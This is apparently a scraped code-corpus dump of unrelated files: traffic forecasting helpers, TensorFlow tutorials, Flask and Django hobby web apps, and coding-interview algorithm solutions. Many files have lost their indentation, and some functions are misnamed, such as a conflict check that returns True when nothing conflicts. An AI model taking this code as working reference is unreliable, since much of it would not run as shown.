fig, ax = plt.subplots(figsize=(18, 6))
data_zoomed = data.loc[day_zoom_range]
print("Data zoomed rows: " + str(data_zoomed.shape[0]))
data_zoomed.plot(x="FECHA", y="TOTAL_VEHICULOS", ax=ax, label="24-25 in zoom")
plt.legend(loc='upper left')
plt.show()
def plot_time_series(data):
fig, axs = plt.subplots(3, 1, constrained_layout=True)
axs[0].plot(data)
axs[0].set_title('subplot 1 - time series plot')
axs[0].set_xlabel('date (15min)')
axs[0].set_ylabel('total vehicles')
axs[1].hist(data)
axs[1].set_title('subplot 2 - histogram')
axs[1].set_xlabel('date (15min)')
axs[1].set_ylabel('total vehicles')
trans_data = log(data)
axs[2].plot(trans_data)
axs[2].set_title('subplot 3 - log transform time series plot')
axs[2].set_xlabel('date (15min)')
axs[2].set_ylabel('total vehicles')
plot_acf(data, lags=50)
plot_pacf(data, lags=50)
plt.show()
```
#### File: src/evaluation/evaluation_metrics.py
```python
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import mean_squared_error
from sklearn.metrics import r2_score
from sklearn.metrics import roc_auc_score
from math import sqrt
def mean_forecast_error_score(forecast, expected):
forecast_errors = [expected[i] - forecast[i] for i in range(len(expected))]
bias = sum(forecast_errors) * 1.0 / len(expected)
print('Bias: %f' % bias)
return bias
def mean_absolute_error_score(forecast, expected):
mae = mean_absolute_error(expected, forecast)
print('MAE: %f' % mae)
return mae
def mean_squared_error_score(forecast, expected):
mse = mean_squared_error(expected, forecast)
print('MSE: %f' % mse)
return mse
def root_mean_squared_error_score(forecast, expected):
if forecast.size == 1:
mse = (expected - forecast) ** 2
else:
mse = mean_squared_error(expected, forecast)
rmse = sqrt(mse)
print('RMSE: %f' % rmse)
return rmse
def r2_metric_score(forecast, expected):
r2 = r2_score(expected, forecast)
print('R2: %f' % r2)
return r2
def roc_metric_score(forecast, expected):
roc = roc_auc_score(expected, forecast)
print('ROC: %f' % roc)
return roc
def ssr_metric_score(forecast, expected):
ssr = ((expected - forecast) ** 2).sum()
print('SSR: %f' % ssr)
return ssr
def sst_metric_score(forecast, expected):
sst = ((expected - expected.mean()) ** 2).sum()
print('SST: %f' % sst)
return sst
```
#### File: repo_B/Test/Select_15_min.py
```python
import time
import os
def read_from_csv_(file):
fp = open(file, 'r')
names = fp.readline()
a = fp.readlines()
fp.close()
return a, names
def write_in_csv_(file,a,names,i):
fp = open(file, 'w')
fp.writelines(names)
fp.writelines(a[i:(i+20)])
fp.close()
def process_(entrada, salida, duerme):
a, nombres = read_from_csv_(entrada)
i = 0
while i < len(a):
write_in_csv_(salida, a, nombres, i)
i = i + 20
time.sleep(duerme)
os.remove(salida)
time.sleep(duerme)
print(i)
def process_stop(entrada, salida, duerme,iters):
a, nombres = read_from_csv_(entrada)
i = 0
lines = iters * 20 # total number of lines to read
while (i < len(a))&(i < lines):
write_in_csv_(salida, a, nombres, i)
i = i + 20
time.sleep(duerme)
os.remove(salida)
time.sleep(duerme)
print(i)
#duerme = 10 # seconds
#entrada = "D:\\Usuarios\mdbrenes\Documents\prueba\Predicciones Anual\enero18.csv"
#salida = "salidaTest.csv"
#process_(entrada,salida,duerme)
``` |
{
"source": "JoanVila03/ConversioImatges",
"score": 2
} |
#### File: JoanVila03/ConversioImatges/fitxers.py
```python
def escriu_capçelera(nom_fitxer):
with open(nom_fitxer, mode='w') as imatge:
imatge.write('P1\n')
imatge.write('3 3\n')
if __name__ == '__main__':
escriu_capçelera('imatge.pbm')
``` |
{
"source": "joanvila/tensorflow-training",
"score": 3
} |
#### File: joanvila/tensorflow-training/01_constant_nodes.py
```python
import os
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def main():
# Const node types
node1 = tf.constant(3.0, dtype=tf.float32)
node2 = tf.constant(4.0) # also tf.float32 implicitly
# The following print prints the nodes, not their value
print(node1, node2)
# To print the value we need to run the computational graph
sess = tf.Session()
print(sess.run([node1, node2]))
if __name__ == "__main__":
main()
```
#### File: joanvila/tensorflow-training/06_loss_function.py
```python
import os
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
def main():
# The lost function calculates how far the current model is
# from the provided data
W = tf.Variable([.3], dtype=tf.float32)
b = tf.Variable([-.3], dtype=tf.float32)
x = tf.placeholder(tf.float32)
linear_model = W * x + b
# y is the placeholder of the desired values we expect from the regression
# linear_model - y is a vector which is element is the error delta
# square de error deltas is a typical loss model for linear regressions
y = tf.placeholder(tf.float32)
squared_deltas = tf.square(linear_model - y)
# We sum all the squared delta errors to create a single scalar
# for representing in an abstract way the error of all the examples
loss = tf.reduce_sum(squared_deltas)
sess = tf.Session()
# Variables must be always initialized
init = tf.global_variables_initializer()
sess.run(init) # Run the initialization
print(sess.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))
# By reassigning the W and b values to -1. and 1. the result would
# match the y vector so the final loss would be 0.0. This means
# we would have guessed the perfect values for W and b.
# However, the whole point of machine learning is to find those
# values automatically
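# Hedged illustration (assuming the TF1-style API used above): manually assign
# the ideal parameters and re-evaluate the loss, which should drop to ~0.0
fixW = tf.assign(W, [-1.])
fixb = tf.assign(b, [1.])
sess.run([fixW, fixb])
print(sess.run(loss, {x: [1, 2, 3, 4], y: [0, -1, -2, -3]}))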
if __name__ == "__main__":
main()
``` |
{
"source": "joanwanjiku/marvel-comics",
"score": 2
} |
#### File: marvel-comics/app/__init__.py
```python
from flask import Flask
from flask_bootstrap import Bootstrap
from config import config_options
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_uploads import IMAGES, UploadSet, configure_uploads
bootstrap = Bootstrap()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
db = SQLAlchemy()
photos = UploadSet('photos', IMAGES)
def create_app(config_name):
# initialize app
app = Flask(__name__, instance_relative_config=True)
# app configurations
app.config.from_object(config_options[config_name])
bootstrap.init_app(app)
db.init_app(app)
login_manager.init_app(app)
# register blueprint
from .main import main as main_bp
app.register_blueprint(main_bp)
from .auth import auth as auth_bp
app.register_blueprint(auth_bp)
configure_uploads(app, photos)
return app
```
#### File: app/main/views.py
```python
from flask import render_template, redirect, url_for,abort,request
from . import main
from flask_login import login_required,current_user
from ..models import User, Comment, Favourite
from .form import UpdateProfile
from .. import db,photos
from ..requests import get_characters, get_character_by_id, get_characters_by_name, get_comics_by_charid, get_all_comics, get_comic_by_id
from . import main
@main.route('/')
def index():
title= 'Home | Marvel'
return render_template('main/index.html')
@main.route('/characters')
def all_characters():
character_search = request.args.get('char_search')
if character_search:
return redirect(url_for('.search_result', char_name=character_search))
chars = get_characters()
return render_template('main/character.html', chars=chars)
@main.route('/comics')
def all_comics():
comics = get_all_comics()
title= 'Comics'
return render_template('main/comic.html', comics = comics, title=title)
@main.route('/results/<char_name>')
def search_result(char_name):
result = get_characters_by_name(char_name)[0]
return render_template('main/search_result.html', result=result)
@main.route('/<int:id>/comics')
def char_comics(id):
character_comics = get_comics_by_charid(id)
return render_template('main/character_comics.html', character_comics = character_comics)
@main.route('/char/<int:id>')
def each_char(id):
character = get_character_by_id(id)[0]
comments = Comment.get_all_comments(id)
title = character.get('name')
return render_template('main/each_char.html', character=character, comments=comments)
@main.route('/comic/<int:id>')
def each_comic(id):
comic = get_comic_by_id(id)[0]
title = 'Comic'
return render_template('main/each_comic.html', comic=comic, title=title)
@main.route('/user/<name>')
def profile(name):
user = User.query.filter_by(username = name).first()
if user is None:
abort(404)
favourites = Favourite.get_favourites(user.id)
return render_template("profile/profile.html", user = user, favourites=favourites)
@main.route('/user/<name>/updateprofile', methods = ['POST','GET'])
@login_required
def updateprofile(name):
form = UpdateProfile()
user = User.query.filter_by(username = name).first()
if user == None:
abort(404)
if form.validate_on_submit():
user.bio = form.bio.data
user.save_u()
return redirect(url_for('main.profile',name = name))
return render_template('profile/update.html',form =form)
@main.route('/user/<name>/update/pic',methods= ['POST'])
@login_required
def update_pic(name):
user = User.query.filter_by(username = name).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',name=name))
@main.route('/char/<int:char_id>/comment', methods=['POST', 'GET'])
@login_required
def char_comment(char_id):
character = get_character_by_id(char_id)[0]
print(character.get('id'))
comments = Comment.get_all_comments(char_id)
if request.method== 'POST':
title = request.form['title']
content = request.form['content']
new_comment = Comment(
char_id = character.get('id'),
char_name = character.get('name'),
char_path = character.get('thumbnail').get('path'),
title = title,
content = content,
user=current_user
)
new_comment.save_comment()
return redirect(url_for('main.each_char', id = char_id))
return render_template('main/each_char.html', character=character, comments=comments)
@main.route('/char/<int:id>/favourite/')
@login_required
def favourite(id):
character = get_character_by_id(id)[0]
comments = Comment.get_all_comments(id)
fav_char = Favourite(
char_id = character.get('id'),
char_name = character.get('name'),
char_path = character.get('thumbnail').get('path'),
user = current_user
)
fav_char.save_fav()
return redirect(url_for('main.each_char', id=character.get('id')))
```
#### File: marvel-comics/tests/test_comic.py
```python
import unittest
from app.models import Comic
class TestComic(unittest.TestCase):
def setUp(self):
self.new_comic = Comic(1, 'marvel 2020', 'amazing looks',20, '/hsfhdhgd')
def test_instance(self):
self.assertTrue(isinstance(self.new_comic, Comic))
``` |
{
"source": "Joan-w/Blogpost",
"score": 3
} |
#### File: blog/main/routes.py
```python
import requests
from flask import render_template, request, Blueprint
from blog.models import Post
main = Blueprint('main', __name__)
@main.route('/')
@main.route('/home')
def home():
page = request.args.get('page', 1, type=int)
posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=5)
title = 'BlogHub'
return render_template('home.html', title=title, posts=posts)
@main.route('/quotes')
def quotes():
url = 'http://quotes.stormconsultancy.co.uk/random.json'
author = '<NAME>'
quote = 'In theory, theory and practice are the same. In practice, they\u2019re not.'
r = requests.get(url.format(author, quote)).json()
quotes = {
'author' : r['author'],
'quote' : r['quote'],
}
print(quotes)
return render_template('quotes.html', title='Random Quotes', quotes=quotes)
@main.route('/about')
def about():
return render_template('about.html')
``` |
{
"source": "Joan-w/gallery",
"score": 2
} |
#### File: gallery/gallery/tests.py
```python
from django.test import TestCase
from .models import Galleryimage, Location, ImageCategory
# Create your tests here.
class ImageTestCase(TestCase):
def setUp(self):
pass
#New picture
self.new_image = Galleryimage(title='Image title', summary='Image summary')
self.new_image.save()
#New location
self.new_location = Location(category='Laikipia')
self.new_location.save()
#New category
self.new_category = ImageCategory(category='food')
self.new_category.save()
def tearDown(self):
Galleryimage.objects.all().delete()
Location.objects.all().delete()
ImageCategory.objects.all().delete()
class LocationTestClass(TestCase):
'''
A test that checks the location of images
'''
def setUp(self):
pass
class ImageCategoryTestClass(TestCase):
'''
A test that checks the image categories
'''
def setUp(self):
pass
``` |
{
"source": "Joan-w/Insta-clone",
"score": 2
} |
#### File: Insta-clone/insta/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
from .models import Post
from .forms import PostForm, UserRegisterForm, UserUpdateForm, ProfileUpdateForm
from django.views.generic import (
ListView,
CreateView,
DetailView,
UpdateView,
DeleteView,
)
# Create your views here.
class PostListView(ListView):
template_name = 'insta/home.html'
queryset = Post.objects.all().filter(created_date__lte=timezone.now()).order_by('-created_date')
context_object_name = 'posts'
class PostCreateView(LoginRequiredMixin, CreateView):
template_name = 'insta/post-create.html'
form_class = PostForm
queryset = Post.objects.all()
success_url = '/'
def form_valid(self, form):
print(form.cleaned_data)
form.instance.author = self.request.user
return super().form_valid(form)
class PostDetailView(DetailView):
model = Post
class PostUpdateView(LoginRequiredMixin, UpdateView):
model = Post
fields = ['image', ]
def form_valid(self, form):
form.instance.author = self.request.user
return super().form_valid(form)
class PostDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Post
success_url = '/'
def test_func(self):
post = self.get_object()
if self.request.user == post.author:
return True
return False
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
# messages.success(request, 'Your account has been created . You can now log in!')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {"form":form})
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
# messages.success(request, 'Your account has been updated successfuly!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form,
}
return render(request, 'users/profile.html', context)
``` |
{
"source": "JoanWu5/Grokking-the-coding-interview",
"score": 4
} |
#### File: Grokking-the-coding-interview/bitwise XOR/two single numbers.py
```python
def find_two_single_numbers(arr):
n1xn2 = 0
for num in arr:
n1xn2 ^= num
rightmost_set_bit = 1
while rightmost_set_bit & n1xn2 == 0:
rightmost_set_bit <<= 1
num1, num2 = 0, 0
for num in arr:
if num & rightmost_set_bit == 0:
num1 ^= num
else:
num2 ^= num
return [num1, num2]
print(find_two_single_numbers([1, 4, 2, 1, 3, 5, 6, 2, 3, 5]))
print(find_two_single_numbers([2, 1, 3, 2]))
```
#### File: Grokking-the-coding-interview/breadth first search/level order successor.py
```python
# Given a binary tree and a node, find the level order successor of the given node in the tree.
# The level order successor is the node that appears right after the given node in the level order traversal.
from collections import deque
class TreeNode:
def __init__(self, value) -> None:
self.value = value
self.left = None
self.right = None
def level_order_successor(root, key):
if root is None:
return None
queue = deque()
queue.append(root)
while queue:
current_node = queue.popleft()
if current_node.left:
queue.append(current_node.left)
if current_node.right:
queue.append(current_node.right)
if current_node.value == key:
break
return queue[0].value if queue else None
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(9)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
print(level_order_successor(root, 12))
print(level_order_successor(root, 9))
```
#### File: Grokking-the-coding-interview/cyclic sort/find all missing numbers.py
```python
def find_all_missing_number(arr):
i = 0
while i < len(arr):
temp = arr[i] - 1
if arr[i] != arr[temp]:
arr[i], arr[temp] = arr[temp], arr[i]
else:
i += 1
print(i, arr)
result = []
for i in range(len(arr)):
if arr[i] != i + 1:
result.append(i+1)
return result
print(find_all_missing_number([2, 3, 1, 8, 2, 3, 5, 1]))
```
#### File: Grokking-the-coding-interview/cyclic sort/find the smallest missing positive number.py
```python
def find_the_smallest_missing_positive_number(arr):
i = 0
while i < len(arr):
j = arr[i] - 1
if arr[i] > 0 and arr[i] <= len(arr) and arr[i] != arr[j]:
arr[i], arr[j] = arr[j], arr[i]
else:
i += 1
for i in range(len(arr)):
if arr[i] != i + 1:
return i + 1
return -1
print(find_the_smallest_missing_positive_number([-3, 1, 5, 4, 2]))
print(find_the_smallest_missing_positive_number([3, -2, 0, 1, 2]))
print(find_the_smallest_missing_positive_number([3, 2, 5, 1]))
```
#### File: Grokking-the-coding-interview/depth first search/all paths for a sum.py
```python
class TreeNode:
def __init__(self, value) -> None:
self.value = value
self.left, self.right = None, None
def all_paths_for_a_sum(current_node, sum_value, current_path, all_paths):
if current_node is None:
return
current_path.append(current_node.value)
if current_node.value == sum_value and current_node.left is None and current_node.right is None:
all_paths.append(current_path.copy()) # must use copy, or the array will be empty in the end
else:
all_paths_for_a_sum(current_node.left, sum_value - current_node.value, current_path, all_paths)
all_paths_for_a_sum(current_node.right, sum_value - current_node.value, current_path, all_paths)
current_path.pop()
return
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(4)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
all_paths = []
all_paths_for_a_sum(root, 23, [], all_paths)
print(all_paths)
# follow up :
# Problem 1: Given a binary tree, return all root-to-leaf paths.
# Solution: We can follow a similar approach. We just need to remove the “check for the path sum”.
# Problem 2: Given a binary tree, find the root-to-leaf path with the maximum sum.
# Solution: We need to find the path with the maximum sum.
# As we traverse all paths, we can keep track of the path with the maximum sum.
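# Hedged sketches for the two follow-up problems above (added for illustration,
# not part of the original solution file):
def all_root_to_leaf_paths(current_node, current_path, all_paths):
    # Problem 1: same traversal as above, just without the running-sum check
    if current_node is None:
        return
    current_path.append(current_node.value)
    if current_node.left is None and current_node.right is None:
        all_paths.append(current_path.copy())
    else:
        all_root_to_leaf_paths(current_node.left, current_path, all_paths)
        all_root_to_leaf_paths(current_node.right, current_path, all_paths)
    current_path.pop()

def max_sum_root_to_leaf(current_node):
    # Problem 2: track the best root-to-leaf sum while traversing
    if current_node is None:
        return float('-inf')
    if current_node.left is None and current_node.right is None:
        return current_node.value
    return current_node.value + max(max_sum_root_to_leaf(current_node.left),
                                    max_sum_root_to_leaf(current_node.right))

paths = []
all_root_to_leaf_paths(root, [], paths)
print(paths)
print(max_sum_root_to_leaf(root))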
```
#### File: Grokking-the-coding-interview/depth first search/path with given sequence.py
```python
class TreeNode:
def __init__(self, value) -> None:
self.value = value
self.left, self.right = None, None
def find_path(root, sequence):
if root is None:
return len(sequence) == 0
return find_path_with_sequence(root, sequence, 0)
def find_path_with_sequence(current_node, sequence, sequence_index):
if current_node is None:
return False
if sequence_index >= len(sequence) or current_node.value != sequence[sequence_index]:
return False
if current_node.left is None and current_node.right is None and sequence_index == len(sequence) - 1:
return True
return find_path_with_sequence(current_node.left, sequence, sequence_index + 1) or \
find_path_with_sequence(current_node.right, sequence, sequence_index + 1)
root = TreeNode(12)
root.left = TreeNode(7)
root.right = TreeNode(1)
root.left.left = TreeNode(9)
root.right.left = TreeNode(10)
root.right.right = TreeNode(5)
print(find_path(root, [12, 7, 9]))
print(find_path(root, [12, 10, 6]))
```
#### File: Grokking-the-coding-interview/dynamic programming/equal subset sum partition.py
```python
def can_partition(num):
sum_num = sum(num)
if sum_num % 2 != 0:
return False
dp = [[-1 for _ in range(int(sum_num/2) + 1)] for _ in range(len(num))]
return True if can_partition_recursive(dp, num, int(sum_num/2), 0) == 1 else False
def can_partition_recursive(dp, num, sum_num, current_index):
if sum_num == 0:
return 1
n = len(num)
if n == 0 or current_index >= n:
return 0
if dp[current_index][sum_num] == -1:
if num[current_index] <= sum_num:
if can_partition_recursive(dp, num, sum_num - num[current_index], current_index + 1):
dp[current_index][sum_num] = 1
return 1
dp[current_index][sum_num] = can_partition_recursive(dp, num, sum_num, current_index + 1)
return dp[current_index][sum_num]
print(can_partition([1, 2, 3, 4]))
print(can_partition([1, 1, 3, 4, 7]))
print(can_partition([2, 3, 4, 6]))
# bottom-up
# O(N * S) space: O(N * S)
def can_partition_2(num):
sum_num = sum(num)
if sum_num % 2 != 0:
return False
sum_num = int(sum_num/2)
n = len(num)
dp = [[False for _ in range(sum_num + 1)] for _ in range(n)]
for i in range(n):
dp[i][0] = True
for j in range(1, sum_num + 1):
dp[0][j] = num[0] == j
for i in range(1, n):
for j in range(1, sum_num + 1):
if dp[i - 1][j]:
dp[i][j] = dp[i - 1][j]
elif j >= num[i]:
dp[i][j] = dp[i - 1][j - num[i]]
return dp[n - 1][sum_num]
print(can_partition_2([1, 2, 3, 4]))
print(can_partition_2([1, 1, 3, 4, 7]))
print(can_partition_2([2, 3, 4, 6]))
```
#### File: Grokking-the-coding-interview/fast_slow pointers/happy number.py
```python
def happy_number(num):
slow, fast = num, num
while True:
slow = find_next_number(slow)
fast = find_next_number(find_next_number(fast))
if slow == fast:
break
return slow == 1
def find_next_number(num):
next_number = 0
while num > 0:
digit = num % 10
next_number += digit * digit
num = num // 10
return next_number
print(happy_number(23))
print(happy_number(12))
```
#### File: Grokking-the-coding-interview/fast_slow pointers/palindorme linkedlist.py
```python
class Node:
def __init__(self, value, next = None) -> None:
self.value = value
self.next = next
def palindorme_linkedlist(head):
if head is None or head.next is None:
return True
middle = find_middle_of_linkedlist(head)
reversed_second_half = reverse_linkedlist(middle)
pointer1, pointer2 = head, reversed_second_half
while pointer1 is not None and pointer2 is not None:
if pointer1.value != pointer2.value:
break
pointer1 = pointer1.next
pointer2 = pointer2.next
reverse_linkedlist(reversed_second_half)
if pointer1 is None or pointer2 is None:
return True
return False
def reverse_linkedlist(head):
new_header = None
while head is not None:
pointer = head.next
head.next = new_header
new_header = head
head = pointer
return new_header
def find_middle_of_linkedlist(head):
slow, fast = head, head
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
return slow
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(2)
head.next.next.next.next = Node(1)
print(palindorme_linkedlist(head))
head.next.next.next.next.next = Node(1)
print(palindorme_linkedlist(head))
head2 = Node(1)
head2.next = Node(2)
head2.next.next = Node(2)
head2.next.next.next = Node(1)
print(palindorme_linkedlist(head2))
```
#### File: Grokking-the-coding-interview/fast_slow pointers/start of linkedlist cycle.py
```python
class Node:
def __init__(self, value, next = None) -> None:
self.value = value
self.next = next
def start_of_linkedlist_cycle(head):
cycle_length = linkedlist_cycle(head)
if cycle_length == 0:
return None
pointer1, pointer2 = head, head
for i in range(cycle_length):
pointer2 = pointer2.next
while pointer1 != pointer2:
pointer1 = pointer1.next
pointer2 = pointer2.next
return pointer1.value
def linkedlist_cycle(head):
slow, fast = head, head
while fast is not None and fast.next is not None:
slow = slow.next
fast = fast.next.next
if slow == fast:
return caculate_linkedlist_cycle(slow)
return 0
def caculate_linkedlist_cycle(pointer):
current = pointer
cycle_length = 0
while True:
current = current.next
cycle_length += 1
if current == pointer:
break
return cycle_length
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(4)
head.next.next.next.next = Node(5)
head.next.next.next.next.next = Node(6)
print(start_of_linkedlist_cycle(head))
head.next.next.next.next.next.next = head.next.next
print(start_of_linkedlist_cycle(head))
```
#### File: Grokking-the-coding-interview/in-place reversal of a linkedlist/reverse alternating k element sub list.py
```python
class Node:
    def __init__(self, value, next=None) -> None:
        self.value = value
        self.next = next
    def print_linkedlist(self):
        temp = self
        while temp is not None:
            print(str(temp.value) + " ", end="")
            temp = temp.next
        print()
def reverse_alternating_k_element_sub_list(head, k):
if head is None or head.next is None or k <= 1:
return head
previous, current = None, head
while True:
last_node_of_previous_part = previous
last_node_of_sub_list = current
next_pointer = None
i = 0
while current is not None and i < k:
next_pointer = current.next
current.next = previous
previous = current
current = next_pointer
i += 1
if last_node_of_previous_part is not None:
last_node_of_previous_part.next = previous
else:
head = previous
last_node_of_sub_list.next = current
i = 0
while current is not None and i < k:
previous = current
current = current.next
i += 1
if current is None:
break
return head
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(4)
head.next.next.next.next = Node(5)
head.next.next.next.next.next = Node(6)
head.next.next.next.next.next.next = Node(7)
head = reverse_alternating_k_element_sub_list(head,3)
head.print_linkedlist()
head = Node(1)
head.next = Node(2)
head.next.next = Node(3)
head.next.next.next = Node(4)
head.next.next.next.next = Node(5)
head.next.next.next.next.next = Node(6)
head.next.next.next.next.next.next = Node(7)
head.next.next.next.next.next.next.next = Node(8)
head = reverse_alternating_k_element_sub_list(head,2)
head.print_linkedlist()
```
#### File: Grokking-the-coding-interview/k way merge/smallest number range.py
```python
from heapq import *
import math
def find_smallest_number_range(lists):
range_start, range_end = 0, math.inf
current_max = -math.inf
minheap = []
for i in range(len(lists)):
heappush(minheap, (lists[i][0], 0, i))
current_max = max(current_max, lists[i][0])
while len(minheap) == len(lists):
num, i, list_index = heappop(minheap)
if range_end - range_start > current_max - num:
range_start = num
range_end = current_max
if i < len(lists[list_index]) - 1:
heappush(minheap, (lists[list_index][i + 1], i + 1, list_index))
current_max = max(current_max, lists[list_index][i + 1])
return [range_start, range_end]
print(find_smallest_number_range([[1, 5, 8], [4, 12], [7, 8, 10]]))
print(find_smallest_number_range([[1, 9], [4, 12], [7, 10, 16]]))
```
#### File: Grokking-the-coding-interview/merge intervals/conflicting appointment.py
```python
def is_conflicting_appointment(arr):  # returns True when no appointments overlap (all can be attended)
start, end = 0, 1
arr.sort(key = lambda x: x[0])
for i in range(1, len(arr)):
if arr[i-1][end] > arr[i][start]:
return False
return True
print(is_conflicting_appointment([[1,4], [2,5], [7,9]]))
print(is_conflicting_appointment([[6,7], [2,4], [8,12]]))
print(is_conflicting_appointment([[4,5], [2,3], [3,6]]))
# follow up: Given a list of appointments, find all the conflicting appointments.
# Example:
# Appointments: [[4,5], [2,3], [3,6], [5,7], [7,8]]
# Output:
# [4,5] and [3,6] conflict.
# [3,6] and [5,7] conflict.
# O(N^2) space:O(N)
def conflicting_appointment(arr):
start, end = 0, 1
arr.sort(key = lambda x: x[0])
result = []
for i in range(len(arr)):
for j in range(i+1, len(arr)):
if arr[i][end] > arr[j][start]:
result.append([arr[i], arr[j]])
return result
print(conflicting_appointment([[1,4], [2,5], [7,9]]))
print(conflicting_appointment([[6,7], [2,4], [8,12]]))
print(conflicting_appointment([[4,5], [2,3], [3,6]]))
print(conflicting_appointment([[4,5], [2,3], [3,6], [5,7], [7,8]]))
```
#### File: Grokking-the-coding-interview/merge intervals/merge intervals.py
```python
# Given a list of intervals,
# merge all the overlapping intervals to produce a list that has only mutually exclusive intervals.
# Example:
# Intervals: [[1,4], [2,5], [7,9]]
# Output: [[1,5], [7,9]]
# Explanation: Since the first two intervals [1,4] and [2,5] overlap, we merged them into one [1,5].
# O(N) for merge O(NlogN) for sorting -> O(NlogN)
# space:O(N)
class Interval:
def __init__(self, start, end) -> None:
self.start = start
self.end = end
def print_interval(self):
print("[" + str(self.start) + "," + str(self.end) + "]", end='')
def merge_intervals(arr):
intervals = []
for i in arr:
intervals.append(Interval(i[0], i[1]))
if len(intervals) < 2:
return intervals
intervals.sort(key = lambda x: x.start)
merged_intervals = []
start = intervals[0].start
end = intervals[0].end
for i in range(1, len(intervals)):
interval = intervals[i]
if interval.start <= end:
end = max(interval.end, end)
else:
merged_intervals.append(Interval(start, end))
start = interval.start
end = interval.end
merged_intervals.append(Interval(start, end))
return merged_intervals
for i in merge_intervals([[1,4], [2,5], [7,9]]):
i.print_interval()
print()
for i in merge_intervals([[6,7], [2,4], [5,9]]):
i.print_interval()
print()
for i in merge_intervals([[1,4], [2,6], [3,5]]):
i.print_interval()
print()
```
#### File: Grokking-the-coding-interview/merge intervals/minimum meeting room.py
```python
from heapq import *
class Meeting:
def __init__(self, start, end) -> None:
self.start = start
self.end = end
def __lt__(self, other):
return self.end < other.end
def min_meeting_rooms(arr):
meetings = []
for i in arr:
meetings.append(Meeting(i[0], i[1]))
meetings.sort(key = lambda x: x.start)
min_rooms = 0
min_heap = []
for meeting in meetings:
while len(min_heap) > 0 and meeting.start >= min_heap[0].end:
heappop(min_heap)
heappush(min_heap, meeting)
min_rooms = max(min_rooms, len(min_heap))
return min_rooms
print(min_meeting_rooms([[1,4], [2,5], [7,9]]))
print(min_meeting_rooms([[6,7], [2,4], [8,12]]))
print(min_meeting_rooms([[1,4], [2,3], [3,6]]))
print(min_meeting_rooms([[4,5], [2,3], [2,4], [3,5]]))
# follow up :
# Problem 1: Given a list of intervals, find the point where the maximum number of intervals overlap.
# ??? don't know how to solve
# Problem 2: Given a list of intervals representing the arrival and departure times of trains to a train station,
# our goal is to find the minimum number of platforms required for the train station so that no train has to wait.
# Problem 2 is equal to the minimum meeting room
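# A possible answer to Problem 1 above, added as a hedged sketch (it is not part of the original
# notes): treat every interval start as +1 and every end as -1, sort the boundary points, and
# sweep them while keeping a running count; the count peaks at the point of maximum overlap.
def max_overlap_point(intervals):
    points = []
    for start, end in intervals:
        points.append((start, 1))   # an interval opens here
        points.append((end, -1))    # an interval closes here
    points.sort()  # at equal coordinates the -1 sorts first, so touching intervals do not overlap
    best_point, best_count, running = None, 0, 0
    for point, delta in points:
        running += delta
        if running > best_count:
            best_count, best_point = running, point
    return best_point
print(max_overlap_point([[1, 4], [2, 5], [7, 9]]))  # 2 -> [1,4] and [2,5] overlap between 2 and 4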
```
#### File: Grokking-the-coding-interview/modified binary search/bitonic array maximum.py
```python
def bitonic_array_maximum(arr):
if len(arr) == 0:
return None
start, end = 0, len(arr) - 1
while start < end:
mid = start + (end - start) // 2
if arr[mid] > arr[mid + 1]:
end = mid
else:
start = mid + 1
return arr[start]
print(bitonic_array_maximum([1, 3, 8, 12, 4, 2]))
print(bitonic_array_maximum([3, 8, 3, 1]))
print(bitonic_array_maximum([8, 3, 1]))
print(bitonic_array_maximum([1, 2, 3, 10]))
```
#### File: Grokking-the-coding-interview/modified binary search/minimum difference element.py
```python
def minimum_difference_element(arr, key):
if len(arr) == 0:
return None
if arr[0] > key:
return arr[0]
if arr[-1] < key:
return arr[-1]
start, end = 0, len(arr) - 1
while start <= end:
mid = start + (end - start) // 2
if arr[mid] == key:
return arr[mid]
elif arr[mid] < key:
start = mid + 1
else:
end = mid - 1
if arr[start] - key < key - arr[end]:
return arr[start]
else:
return arr[end]
print(minimum_difference_element([4, 6, 10], 7))
print(minimum_difference_element([4, 6, 10], 4))
print(minimum_difference_element([4, 6, 10], 17))
print(minimum_difference_element([1, 3, 8, 10, 15], 12))
```
#### File: Grokking-the-coding-interview/modified binary search/search in a sorted infinite array.py
```python
import math
class ArrayReader:
def __init__(self, arr) -> None:
self.arr = arr
def get(self, index):
if index >= len(self.arr):
return math.inf
return self.arr[index]
def search_in_infinite_array(reader, key):
start, end = 0, 1
while reader.get(end) < key:
new_start = end + 1
end += (end - start + 1) * 2
start = new_start
return binary_search(reader, start, end, key)
def binary_search(reader, start, end, key):
while start <= end:
mid = start + (end - start) // 2
if reader.get(mid) == key:
return mid
elif reader.get(mid) < key:
start = mid + 1
else:
end = mid - 1
return -1
